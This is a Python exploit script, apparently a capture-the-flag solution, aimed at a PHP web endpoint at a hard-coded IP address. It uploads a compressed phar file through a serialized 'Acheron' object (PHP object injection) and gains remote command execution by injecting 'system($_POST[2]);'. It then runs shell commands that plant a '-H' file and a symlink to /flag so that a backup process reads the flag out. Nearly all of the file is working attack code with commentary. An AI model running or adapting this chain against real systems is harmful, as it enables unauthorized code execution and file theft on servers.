| import http.client
import urllib.parse
import gzip
import re
import time
import socket
def _post(url, body, headers=None, timeout=None):
    """Send one HTTP POST to ``url`` and return the response body as text.

    Args:
        url: Full URL; scheme, host, port, path and query are split out of it.
        body: Request body, handed straight to ``HTTPConnection.request``.
        headers: Header dict. When falsy, a single
            ``Content-Type: application/x-www-form-urlencoded`` header is sent.
        timeout: Socket timeout in seconds passed to ``HTTPConnection``.

    Returns:
        The response body decoded as UTF-8, undecodable bytes dropped.

    Note:
        The connection is always a plain ``http.client.HTTPConnection``; an
        ``https`` URL only changes the default port to 443, no TLS is set up,
        so the request would go out unencrypted to that port.
    """
    parts = urllib.parse.urlsplit(url)
    if parts.port:
        port = parts.port
    else:
        port = 80 if parts.scheme == 'http' else 443
    target = parts.path if parts.path else '/'
    if parts.query:
        target = f"{target}?{parts.query}"
    if not headers:
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    conn = http.client.HTTPConnection(parts.hostname, port, timeout=timeout)
    try:
        conn.request("POST", target, body=body, headers=headers)
        # Response is read fully before the connection is closed below.
        return conn.getresponse().read().decode('utf-8', 'ignore')
    finally:
        conn.close()
def write(url: str) -> str | None:
    """Send the local ``phar.phar`` to the endpoint's ``Acheron`` object in write mode.

    Reads ``phar.phar`` from the current working directory, gzip-compresses
    it and sends it URL-encoded as form field ``0``.  Field ``1`` holds a
    PHP-serialized ``Acheron`` object with ``mode`` set to ``"w"``; the
    endpoint is presumably unserializing that field (PHP object injection),
    but the server side is not visible here.

    Args:
        url: Base URL of the endpoint.

    Returns:
        The first ``/tmp/<32 hex chars>.phar`` path found in the response,
        or ``None`` when the response contains no such path.

    Raises:
        FileNotFoundError: if ``phar.phar`` does not exist in the working
            directory (from ``open``).
    """
    with open('phar.phar', 'rb') as f:
        raw = f.read()
    gz = gzip.compress(raw)
    # quote_from_bytes: the compressed blob is binary, so it is percent-encoded
    # before being placed in a urlencoded body.
    v0 = urllib.parse.quote_from_bytes(gz)
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"w";}' + '&0=' + v0
    r = _post(url, body, {'Content-Type':'application/x-www-form-urlencoded'})
    # The response is expected to echo where the upload landed.
    m = re.search(r'/tmp/[0-9a-f]{32}\.phar', r)
    if not m:
        return None
    return m.group(0)
def read(url: str, phar_path: str) -> str | None:
    """Ask the endpoint's ``Acheron`` object (read mode) to open ``phar_path``.

    Field ``1`` is the serialized object with ``mode`` ``"r"``; field ``0``
    is the percent-encoded path.  Only the literal substring ``flag`` is
    searched for in the response, so the return value is at most that
    marker, never the surrounding content.

    Args:
        url: Base URL of the endpoint.
        phar_path: Server-side path returned by ``write``.

    Returns:
        ``"flag"`` if the response contains it, else ``None``.
    """
    v0 = urllib.parse.quote(phar_path, safe='')
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"r";}' + '&0=' + v0
    r = _post(url, body, {'Content-Type':'application/x-www-form-urlencoded'})
    m = re.search(r'flag', r)
    return m.group(0) if m else None
def runtime_exec(url: str, phar_path: str, cmd: str) -> str:
    """POST the read-mode payload plus ``cmd`` as field ``2`` and return the raw response.

    ``?1=system($_POST[2]);`` is appended to ``url`` verbatim, so a ``url``
    that already carries a query string would end up with a second ``?``.
    Both that query parameter and the serialized object in the body are
    high-signal strings for request logging or a WAF rule on the server side.

    Args:
        url: Base URL of the endpoint (no query string expected).
        phar_path: Server-side path returned by ``write``.
        cmd: Command text, percent-encoded before being placed in the body.

    Returns:
        The decoded response body, unfiltered.
    """
    v0 = urllib.parse.quote(phar_path, safe='')
    v2 = urllib.parse.quote(cmd, safe='')
    body = '1=' + 'O:7:"Acheron":1:{s:4:"mode";s:1:"r";}' + '&0=' + v0 + '&2=' + v2
    r = _post(url + "?1=system($_POST[2]);", body, {'Content-Type':'application/x-www-form-urlencoded'})
    return r
def getflag(url: str, phar_path: str) -> str | None:
    """Run a fixed sequence of ``runtime_exec`` calls and extract a ``flag{...}`` token.

    Each step is a separate request: ``pwd`` (the response must contain
    ``/var/www/html`` or nothing else is attempted), ``touch -- -H``,
    ``ln -s /flag flag``, a 15 s pause, then ``cat backup/flag``.  What
    populates ``backup/`` during the pause is not visible in this script.

    Args:
        url: Base URL of the endpoint.
        phar_path: Server-side path returned by ``write``.

    Returns:
        The matched ``flag{...}`` string.  Returns ``None`` (by falling off
        the end) when the ``pwd`` marker is absent or no flag pattern is
        found in the final response.
    """
    r1 = runtime_exec(url, phar_path, "pwd")
    m1 = re.search(r'/var/www/html', r1)
    if m1:
        print("[+] 命中标记,可以进行下一步")
        runtime_exec(url, phar_path, "touch -- -H")
        print("成功创建覆盖项")
        time.sleep(1)
        runtime_exec(url, phar_path, "ln -s /flag flag")
        print("成功创建软连接")
        # Fixed wait before reading back; the reason for 15 s is not shown here.
        time.sleep(15)
        r2 = runtime_exec(url, phar_path, "cat backup/flag")
        m2 = re.search(r'flag\{[^}\r\n]+\}', r2, re.I)
        if m2:
            return m2.group(0)
    else:
        print("[-] 未命中标记,退出或重试")
if __name__ == '__main__':
    # Target URL is hard-coded rather than taken from the command line.
    url = "http://156.239.238.130:8000/"
    phar_path = write(url)
    # write() returns None when the response carries no /tmp/...phar path;
    # nothing further is attempted in that case.
    if phar_path:
        time.sleep(1)
        print(read(url, phar_path))
        time.sleep(1)
        # Prints None when getflag() finds neither the pwd marker nor a flag.
        flag = getflag(url, phar_path)
        print(flag)